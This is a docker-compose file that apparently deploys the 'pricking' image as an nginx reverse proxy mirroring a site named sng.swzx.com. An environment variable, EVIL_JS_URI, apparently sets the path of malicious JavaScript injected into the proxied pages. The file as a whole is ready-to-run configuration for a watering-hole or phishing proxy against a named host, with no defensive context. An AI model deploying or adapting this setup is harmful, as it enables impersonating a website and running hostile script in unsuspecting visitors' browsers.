version: '3'
services:
  nginx:
    image: rvn0xsy/pricking:v1
    ports:
     - "80:80"
    volumes:
     - ./:/tmp/pricking
    environment:
      PROXY_PASS_HOST: proxy.sng.swzx.com
      PROXY_SOURCE_HOST: sng.swzx.com
      NGINX_LISTEN_PORT: 80
      EVIL_JS_URI: b026324c6904b2a9cb4b88d6d61c81d1